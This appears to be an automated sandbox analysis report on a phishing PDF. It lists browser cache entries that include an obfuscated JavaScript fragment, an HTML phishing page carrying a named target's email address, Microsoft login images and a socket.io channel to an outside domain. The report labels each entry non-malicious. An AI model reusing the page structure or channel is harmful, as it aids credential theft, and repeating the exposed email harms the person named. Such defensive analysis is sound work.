                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                            Chrome Cache Entry: 190

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                            Category:dropped
                                            Size (bytes):100217
                                            Entropy (8bit):4.516971585573025
                                            Encrypted:false
                                            SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAJ:ix2wtA4+eS6e6+XE3TLJCLIlAJ
                                            MD5:017BA3A123ED0DDCC1CB574DB1AB45FC
                                            SHA1:90A39446F215BA114A27A037E2B06CAF136A8EEB
                                            SHA-256:678C163A3A83C2708B30E296468344A7AD21125A38B10DA67B7C6B55DFF7944A
                                            SHA-512:64852E0525671F98EBD79252DA1C8C8FABD641AC4EEC75FAB1E0FE425B367C6B596F108D7B7E54EC04679E732E6E1395DCDDE26DD63BD1C9A6BCEBFEA0CF994A
                                            Malicious:false
                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151

                                            Chrome Cache Entry: 191

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:dropped
                                            Size (bytes):1636
                                            Entropy (8bit):4.214613323368661
                                            Encrypted:false
                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                            Malicious:false
                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

                                            Chrome Cache Entry: 192

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 4233
                                            Category:dropped
                                            Size (bytes):2178
                                            Entropy (8bit):7.909869530388447
                                            Encrypted:false
                                            SSDEEP:48:Xlh2vBPJOeOENB85PwXyjRWpMcuwXhgKAkkS86r8ZGwNCo+o1BBmnim:f0zzRCjRWpMcuwPkS86r8Zpyim
                                            MD5:A82353A407066099B4607ED4CC207E0A
                                            SHA1:73BB1474771688BD8A80AB270C06F250C981DFE9
                                            SHA-256:DA2CC7DF7F16001040E28DF50034166362A936629699807254F5B7160EAA4F0D
                                            SHA-512:D9DE69D90720C3135947D331A5979A6E91F1D39E1D1A8E9FACAD00597A1DD5D9C505B365FC2F35768366FC8D8E777172A41542A2E33F0E1771EFDE24B740F51F
                                            Malicious:false
                                            Preview:...........Rm..........T..%.e..f.krh.4I.....@Q..o!).....d..6E..K....<|.n.V7...n.....(..7o>......?.?~...SC]i.......zR.R.c..U.....)....M..pDV.'..vBB<(.z..&.A..y......:.'jg.x.f`.q......5B.M."y....>.....".]...S0..|.P2...mM.J.jqEZ.....LN...Sn.l.._>L..'..C.... .......n...;..8.bQv.a.[e........[..:\....z)<. ...9...........9.K...[.N.m<S..+.U.9..>S...(*...ric..O....a........ ....T.....a.q4..XrA...7...)Y?..=..Q.3.k.}@.e..+.x..m.^.B<(qsZ4.U......T{.......u.{Z....E..51.'CH'.lG...).bA..*_\-..dZ.........B.mk..*.....w.wi..].x.....w[.++."3| ..x:.<.f....Yl.[e....g..Y.......X$O.6....x.....<E....A..q..>...[S.!..kX=..,o5ZsP.'%..o.w..TB[..4F.......bT...Td...H.l....0....5L.29.)...5..{.......zb.G....&?..w....#:...o.w.={.K.M..R.7..;<......D$.n.. ^.....7..3.L..,7...B.6..8......Ul3.R1.+...!.....)..I#`+.J...u ..E:.X.U....;...U-.h.e.e.@k|.#..[.........D.NxF4.%H.H............{.^$H......... ....`.d.....@..B.6SZz.c.(iv.t.b...g.......+.{)...)z*.......a5.3X-_f0...E

                                            Chrome Cache Entry: 193

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text
                                            Category:downloaded
                                            Size (bytes):443
                                            Entropy (8bit):5.666178797438685
                                            Encrypted:false
                                            SSDEEP:12:4WYcVkpD2PP/K6bGu8AWOvfWLSsPZ45dWDd4NbAGbD4NGb:4WYcVvJquRvHWL7PS58Dd4NkG/4NM
                                            MD5:144351B0B621652E38F4BFF5FD7A12C7
                                            SHA1:F1589AA8385C60D485786CAC8F5F003CEC3DFAF0
                                            SHA-256:2D2C0D7EA28E2FA1D438E4AD14A06941C186839A1D0E3BC2C1760B903193F4ED
                                            SHA-512:0E539AD411C51042011CAB23D02BF1B419D15C6DB6EBBBAB82D60E4E36F7BF1A2B7E380A751D844A3681BC1F58514DC28E7A3A9EC4057E68EC4D2E3C9115B983
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it
                                            Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqQXhNRGN5TURJMFZVNUpVVlZGTURJeE9EQTNNREV4TURJd01qUXlNREkwTURjd01URTRNREl4TUE9PQ==' vic='diana.panaccione@banca.mps.it' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>

                                            Chrome Cache Entry: 194

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:downloaded
                                            Size (bytes):52
                                            Entropy (8bit):4.190260390968384
                                            Encrypted:false
                                            SSDEEP:3:OnuZoS+NT/ZoS8/ZYn:OnuZoSyT/ZoS8/ZYn
                                            MD5:09BDE5D10D92DEBBB74AE9C3DF3AECAB
                                            SHA1:2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
                                            SHA-256:F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
                                            SHA-512:0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
                                            Malicious:false
                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQmlv2e_JvBBuBIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
                                            Preview:CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=

                                            Chrome Cache Entry: 195

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):2228
                                            Entropy (8bit):7.82817506159911
                                            Encrypted:false
                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                            Malicious:false
                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                            Chrome Cache Entry: 196

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                            Category:downloaded
                                            Size (bytes):199
                                            Entropy (8bit):6.766983163126765
                                            Encrypted:false
                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                            MD5:21B761F2B1FD37F587D7222023B09276
                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                            Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

                                            Chrome Cache Entry: 197

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:downloaded
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                            Chrome Cache Entry: 198

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JSON data
                                            Category:downloaded
                                            Size (bytes):41
                                            Entropy (8bit):4.180365114215879
                                            Encrypted:false
                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                            Malicious:false
                                            URL:https://drensyoons1sedt.com/socket.io/?EIO=4&transport=polling&t=PCg0nb7&sid=Szo4MAahAIm3BkqEABL6
                                            Preview:{"code":1,"message":"Session ID unknown"}

                                            Chrome Cache Entry: 199

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 100217
                                            Category:downloaded
                                            Size (bytes):19397
                                            Entropy (8bit):7.9818968069584955
                                            Encrypted:false
                                            SSDEEP:384:Lxqr2jjvGDzqZPUrdB6gMBLrWH6skJGU+XqXLmXGWN5p8:LxVG/qZimTLrO6dJ5+XumlNQ
                                            MD5:7C890A083C04240A86C34574FC003B7C
                                            SHA1:F29EFB6015BBBA9EF2C90A6BDCB98C5009ACAA64
                                            SHA-256:D35AC96DFAC2E25CCB32EFB7CABADC089DF41DFD9B7B3072C50FABF6169FC598
                                            SHA-512:23D029F81B6AB6FD759CCBA3695C6741F983775DF1BB939CF19685A22A083787D3A9C186AED65DE02E59538B42E3331D9AD6EA3DA167EA3A152BDF16A3AA6EB0
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/m/jsnom.js
                                            Preview:.............8.%...B.<N..../.(9lW.NW...iO..5..O...$Q.....Iv.|.....y.y....Q!.)EDe..[.../k....cM..\.3/Apb.`.#orZ...8.....\.:...v...Ozg........Y.=Y..]0...V.V.....3@g..v...7..G...U..u.Y....{...Mh..w...#<....w....w..v. O.u.g....QP_...6a.Q.....>~Z.....o|5..|.\.Z ..5.'..'f...z...........E..?g./r..r."gxC.^..s..u....\+:k.B....)O.nJ.K@..|`..|.....N6"*..6.^o]..........ha.Vm:_m....z...i.}....igJ9..]D.+...*.....2.H...r.5..)G.p..2...M..........q.....^...~.n..\...._.6.?}xs.....#.......g....z..e:g..e.../F.2....q.....6u..d...Ve...;..nv=.._!..x!....$0..U;.SJtf...-f.j2.i.m.*.hU.#.R~XMa.Ly.hQ...[.J..3....z.#x.Z.Q..0H..a...=M.j....tk....3]...n+..N..Po-!?j.`.[.f".....8..!...yz..c.h..!.B."G"BK....@.NZ*...}%.2.z...v....:Q..1...._!..T.C%0......0....x.31.-I^..EaK.~.y....."Ict..i..}..a.1r..=....".{Lb.......q..3...jGK.U"d..~.'.....P9..u.[cX.8....L 2.^..HU'...T.....l..n.~.=.z..6.0O$.A5.~i..}.:../..F...@.N..%>..........w..!.[......w?......r=..%...rP.....[st_t.1.wl...>

                                            Chrome Cache Entry: 200

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:ASCII text, with very long lines (49854)
                                            Category:downloaded
                                            Size (bytes):49993
                                            Entropy (8bit):5.216475744251136
                                            Encrypted:false
                                            SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                            MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                            SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                            SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                            SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                            Malicious:false
                                            URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                            Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th

                                            Chrome Cache Entry: 201

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                            Category:downloaded
                                            Size (bytes):2407
                                            Entropy (8bit):7.900400471609788
                                            Encrypted:false
                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                            Malicious:false
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                            Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

                                            Chrome Cache Entry: 202

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                            Category:downloaded
                                            Size (bytes):276
                                            Entropy (8bit):7.316609873335077
                                            Encrypted:false
                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                            Malicious:false
                                            URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

                                            Chrome Cache Entry: 203

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, from Unix, original size modulo 2^32 4233
                                            Category:downloaded
                                            Size (bytes):2178
                                            Entropy (8bit):7.909869530388447
                                            Encrypted:false
                                            SSDEEP:48:Xlh2vBPJOeOENB85PwXyjRWpMcuwXhgKAkkS86r8ZGwNCo+o1BBmnim:f0zzRCjRWpMcuwPkS86r8Zpyim
                                            MD5:A82353A407066099B4607ED4CC207E0A
                                            SHA1:73BB1474771688BD8A80AB270C06F250C981DFE9
                                            SHA-256:DA2CC7DF7F16001040E28DF50034166362A936629699807254F5B7160EAA4F0D
                                            SHA-512:D9DE69D90720C3135947D331A5979A6E91F1D39E1D1A8E9FACAD00597A1DD5D9C505B365FC2F35768366FC8D8E777172A41542A2E33F0E1771EFDE24B740F51F
                                            Malicious:false
                                            URL:https://www.shop4myhealth.ukyb.com/favicon.ico
                                            Preview:...........Rm..........T..%.e..f.krh.4I.....@Q..o!).....d..6E..K....<|.n.V7...n.....(..7o>......?.?~...SC]i.......zR.R.c..U.....)....M..pDV.'..vBB<(.z..&.A..y......:.'jg.x.f`.q......5B.M."y....>.....".]...S0..|.P2...mM.J.jqEZ.....LN...Sn.l.._>L..'..C.... .......n...;..8.bQv.a.[e........[..:\....z)<. ...9...........9.K...[.N.m<S..+.U.9..>S...(*...ric..O....a........ ....T.....a.q4..XrA...7...)Y?..=..Q.3.k.}@.e..+.x..m.^.B<(qsZ4.U......T{.......u.{Z....E..51.'CH'.lG...).bA..*_\-..dZ.........B.mk..*.....w.wi..].x.....w[.++."3| ..x:.<.f....Yl.[e....g..Y.......X$O.6....x.....<E....A..q..>...[S.!..kX=..,o5ZsP.'%..o.w..TB[..4F.......bT...Td...H.l....0....5L.29.)...5..{.......zb.G....&?..w....#:...o.w.={.K.M..R.7..;<......D$.n.. ^.....7..3.L..,7...B.6..8......Ul3.R1.+...!.....)..I#`+.J...u ..E:.X.U....;...U-.h.e.e.@k|.#..[.........D.NxF4.%H.H............{.^$H......... ....`.d.....@..B.6SZz.c.(iv.t.b...g.......+.{)...)z*.......a5.3X-_f0...E

                                            Chrome Cache Entry: 204

                                            Download File
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:dropped
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                            Static File Info

                                            General

                                            File type:PDF document, version 1.4, 0 pages
                                            Entropy (8bit):7.789026690182917
                                            TrID:
                                            • Adobe Portable Document Format (5005/1) 100.00%
                                            File name:Updated_Proposal_20241113_pdf_banca.pdf
                                            File size:34'633 bytes
                                            MD5:53d9a51b1c57265887013aac78134bf6
                                            SHA1:faa2f71fb8becfdb149838cfa6e2021052d70a94
                                            SHA256:79e3ec607922b203c9b48ee2bcc59d7130c38a332ad15fc5cdfe8eec87886319
                                            SHA512:2a5ef923b5177a71af902cb8a51d31cf85a266c469f9d99faa4fe0ea531ec34796a5c551cfd8420a81aaaf489b18160cb2168f683e7bf47a45591f861091c59a
                                            SSDEEP:768:7UyV8XJPI7x+rbQ+kbj/uMi9HQ010ODdoPnxEZ/:wPvoqQKDmxa/
